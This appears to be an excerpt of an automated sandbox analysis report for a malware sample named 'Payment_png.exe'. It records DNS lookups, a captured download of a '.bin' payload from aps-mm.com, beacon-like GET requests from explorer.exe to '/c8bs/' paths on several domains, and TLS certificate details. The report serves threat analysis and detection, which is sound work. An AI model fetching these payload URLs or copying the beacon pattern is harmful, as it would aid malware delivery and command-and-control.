Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	www.loversdeal.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.218	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.217	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.211	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.212	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.216	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:26.610491037 CEST	8.8.8.8	192.168.2.3	0x77dc	No error (0)	parkingpage.namecheap.com		198.54.117.210	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:32.202716112 CEST	8.8.8.8	192.168.2.3	0xd2ca	No error (0)	www.booksfall.com	www.booksfall.com.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:37.686423063 CEST	8.8.8.8	192.168.2.3	0x8448	No error (0)	www.pcpartout.com	www197.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:37.686423063 CEST	8.8.8.8	192.168.2.3	0x8448	No error (0)	www197.wixdns.net	balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:37.686423063 CEST	8.8.8.8	192.168.2.3	0x8448	No error (0)	balancer.wixdns.net	5f36b111-balancer.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:37.686423063 CEST	8.8.8.8	192.168.2.3	0x8448	No error (0)	5f36b111-balancer.wixdns.net	td-balancer-euw2-6-109.wixdns.net		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:37.686423063 CEST	8.8.8.8	192.168.2.3	0x8448	No error (0)	td-balancer-euw2-6-109.wixdns.net		35.246.6.109	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:42.936120987 CEST	8.8.8.8	192.168.2.3	0xd02a	No error (0)	www.birkenhof-allgaeu.net		217.160.0.233	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:48.231761932 CEST	8.8.8.8	192.168.2.3	0x1385	No error (0)	www.choupisson.com		66.96.160.133	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:53.579756021 CEST	8.8.8.8	192.168.2.3	0x4e8a	No error (0)	www.uforservice.com	uforservice.com		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 13:59:53.579756021 CEST	8.8.8.8	192.168.2.3	0x4e8a	No error (0)	uforservice.com		23.227.38.32	A (IP address)	IN (0x0001)
Mar 29, 2021 13:59:58.890744925 CEST	8.8.8.8	192.168.2.3	0x2170	Name error (3)	www.domennyarendi39.net	none	none	A (IP address)	IN (0x0001)
Mar 29, 2021 14:00:04.060530901 CEST	8.8.8.8	192.168.2.3	0x184f	Name error (3)	www.accinf5.com	none	none	A (IP address)	IN (0x0001)
Mar 29, 2021 14:00:09.134391069 CEST	8.8.8.8	192.168.2.3	0xdb28	No error (0)	www.silverdollarcafe.com	silverdollarcafe.com		CNAME (Canonical name)	IN (0x0001)
Mar 29, 2021 14:00:09.134391069 CEST	8.8.8.8	192.168.2.3	0xdb28	No error (0)	silverdollarcafe.com		34.102.136.180	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

aps-mm.com

www.aps-mm.com

www.plowbrothers.com

www.loversdeal.com

www.pcpartout.com

www.birkenhof-allgaeu.net

www.choupisson.com

www.uforservice.com

www.silverdollarcafe.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49712	170.249.199.106	80	C:\Users\user\Desktop\Payment_png.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:58:28.675035000 CEST	290	OUT	GET /bin_BNUtTDfY243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: aps-mm.com Cache-Control: no-cache
Mar 29, 2021 13:58:28.811625957 CEST	291	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 29 Mar 2021 11:58:28 GMT Server: Apache Location: http://www.aps-mm.com/bin_BNUtTDfY243.bin Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 70 73 2d 6d 6d 2e 63 6f 6d 2f 62 69 6e 5f 42 4e 55 74 54 44 66 59 32 34 33 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49713	170.249.199.106	80	C:\Users\user\Desktop\Payment_png.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:58:29.131409883 CEST	292	OUT	GET /bin_BNUtTDfY243.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: www.aps-mm.com Connection: Keep-Alive
Mar 29, 2021 13:58:29.270570040 CEST	292	IN	HTTP/1.1 302 Found Date: Mon, 29 Mar 2021 11:58:29 GMT Server: Apache Location: https://www.aps-mm.com/bin_BNUtTDfY243.bin Content-Length: 226 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 70 73 2d 6d 6d 2e 63 6f 6d 2f 62 69 6e 5f 42 4e 55 74 54 44 66 59 32 34 33 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.aps-mm.com/bin_BNUtTDfY243.bin">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49734	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:15.924201012 CEST	4022	OUT	GET /c8bs/?oX=mHnwrZz1sKQS3zf7QeEgVUMWoZ3Lc4fpOuayWuCDpyWMt82/PBRmHPawc0L3Kfl51U/x&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.plowbrothers.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 13:59:16.123061895 CEST	4023	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 29 Mar 2021 11:59:16 GMT Content-Type: text/html Content-Length: 275 ETag: "606189d6-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49735	198.54.117.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:26.801275015 CEST	4879	OUT	GET /c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.loversdeal.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49737	35.246.6.109	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:37.759048939 CEST	4882	OUT	GET /c8bs/?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c/5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.pcpartout.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 13:59:37.861877918 CEST	4883	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 29 Mar 2021 11:59:37 GMT Content-Length: 0 Connection: close location: https://www.pcpartout.com/c8bs?oX=mCtx4UHL9mNzF3EVU4c9VHavM1DFjubq04c%2F5ShdsOuIyPGtiFj7akTOwHhyuxeIGqkY&sPj0qt=EzuD_nNPa4wlp strict-transport-security: max-age=120 x-wix-request-id: 1617019177.80584040510711231 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2 X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVjiVMoGgJZPyIJpdYBUTBrV,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalvfZD7TLdGiEhML9WpD1EDCGLdCQN31ePkoJDRNIDPa3GgqFbFMYwiXnFojPwdof6CrAvUe7erS/8UkenfHSRWs=,2UNV7KOq4oGjA5+PKsX47FoxTR+xW4dT2i2c322L5wc=,LXlT8qjS5x6WBejJA3+gBYyEjTvzigG4XLss7FD8eEGTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,9bmvtgOsMBj+rhOGTJK8foYtDIPVQKjbBTecFiwGIGNvOTD8KsDugQppFc8+khY5muOkfcTSJaUOHlD2KQbqrA== Cache-Control: no-cache Server: Pepyaka/1.19.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49738	217.160.0.233	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:42.981523991 CEST	4884	OUT	GET /c8bs/?oX=LeA7SnvTFXlqZuqbSI7RL/JE3Y5e3FfIcVn/p/TMp/5vx2Fx/wjFaW5mPJS2e1LpHtn7&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.birkenhof-allgaeu.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 13:59:43.026885033 CEST	4885	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 29 Mar 2021 11:59:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49741	66.96.160.133	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:48.360106945 CEST	4921	OUT	GET /c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.choupisson.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 13:59:48.489104986 CEST	4922	IN	HTTP/1.1 302 Found Date: Mon, 29 Mar 2021 11:59:48 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 313 Connection: close Server: Apache/2 Location: https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp Cache-Control: max-age=3600 Expires: Mon, 29 Mar 2021 12:59:48 GMT Accept-Ranges: bytes Age: 0 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 68 6f 75 70 69 73 73 6f 6e 2e 63 6f 6d 2f 63 38 62 73 2f 3f 6f 58 3d 56 41 2b 52 68 65 55 68 6e 48 36 49 5a 62 6d 2b 55 38 59 32 6d 7a 43 6e 57 63 30 39 62 33 4a 48 69 47 46 56 36 6e 73 42 68 42 49 61 44 76 31 54 47 44 42 44 4f 47 68 49 54 75 65 41 66 46 66 76 2b 46 32 4f 26 61 6d 70 3b 73 50 6a 30 71 74 3d 45 7a 75 44 5f 6e 4e 50 61 34 77 6c 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.choupisson.com/c8bs/?oX=VA+RheUhnH6IZbm+U8Y2mzCnWc09b3JHiGFV6nsBhBIaDv1TGDBDOGhITueAfFfv+F2O&sPj0qt=EzuD_nNPa4wlp">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49742	23.227.38.32	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 13:59:53.620903015 CEST	4923	OUT	GET /c8bs/?oX=O8PbLgx16hMIOJ1rZ9qRlhWRXDOrjvK9cMkfWsk/HAIbj7Mo3Z6p/LmWsoKge1OKT5Rd&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.uforservice.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 13:59:53.792627096 CEST	4924	IN	HTTP/1.1 403 Forbidden Date: Mon, 29 Mar 2021 11:59:53 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 159 X-Sorting-Hat-ShopId: 46980300960 X-Dc: gcp-us-central1 X-Request-ID: 3034cefa-2765-4a18-84be-5fd56af09bd9 Set-Cookie: _shopify_fs=2021-03-29T11%3A59%3A53Z; Expires=Tue, 29-Mar-22 11:59:53 GMT; Domain=uforservice.com; Path=/; SameSite=Lax X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block CF-Cache-Status: DYNAMIC cf-request-id: 091f73e1350000c2bdc20e0000000001 Server: cloudflare CF-RAY: 6378ef485d13c2bd-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font
Mar 29, 2021 13:59:53.792691946 CEST	4926	IN	Data Raw: 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 Data Ascii: -size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6re
Mar 29, 2021 13:59:53.792754889 CEST	4927	IN	Data Raw: e0 b8 87 e0 b9 80 e0 b8 a7 e0 b9 87 e0 b8 9a e0 b9 84 e0 b8 8b e0 b8 95 e0 b9 8c e0 b8 99 e0 b8 b5 e0 b9 89 22 0a 20 20 7d 2c 0a 20 20 22 70 74 2d 42 52 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 65 73 73 6f 20 6e 65 67 61 64 Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permis
Mar 29, 2021 13:59:53.792814016 CEST	4928	IN	Data Raw: 20 22 65 6e 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 73 20 64 65 6e 69 65 64 22 2c 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 2d 74 69 74 6c 65 22 3a 20 22 59 6f 75 20 64 6f 20 6e 6f 74 20 68 61 76 65 20 70 65 72 6d 69 Data Ascii: "en": { "title": "Access denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
Mar 29, 2021 13:59:53.792861938 CEST	4929	IN	Data Raw: 62 72 6f 77 73 65 72 73 0a 20 20 20 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 4c 61 6e 67 75 61 67 65 20 7c 7c 20 2f 2f 20 49 45 20 3c 3d 20 31 30 0a 20 20 20 20 22 65 6e 22 3b 0a 20 20 6c 61 6e 67 75 61 67 65 20 3d 20 6c 61 6e 67 75 61 67 65 Data Ascii: browsers navigator.userLanguage \|\| // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] \|\| t["en"]; // Replace content on screen for (var id in translations) { target = docum

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49743	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2021 14:00:09.173280001 CEST	4931	OUT	GET /c8bs/?oX=9WVnx7W/2jtf/SBQb7qMRqW55HQP5AXdTxivKH+RIJcLuGeyWux88wPL6knHSRGt/sw8&sPj0qt=EzuD_nNPa4wlp HTTP/1.1 Host: www.silverdollarcafe.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 29, 2021 14:00:09.372026920 CEST	4931	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Mon, 29 Mar 2021 12:00:09 GMT Content-Type: text/html Content-Length: 275 ETag: "605e0bcb-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Mar 29, 2021 13:58:29.576385975 CEST	170.249.199.106	443	192.168.2.3	49714	CN=aps-mm.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 16 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Tue Jun 15 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Payment_png.exe PID: 6076 Parent PID: 5584

General

Start time:	13:57:57
Start date:	29/03/2021
Path:	C:\Users\user\Desktop\Payment_png.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Payment_png.exe'
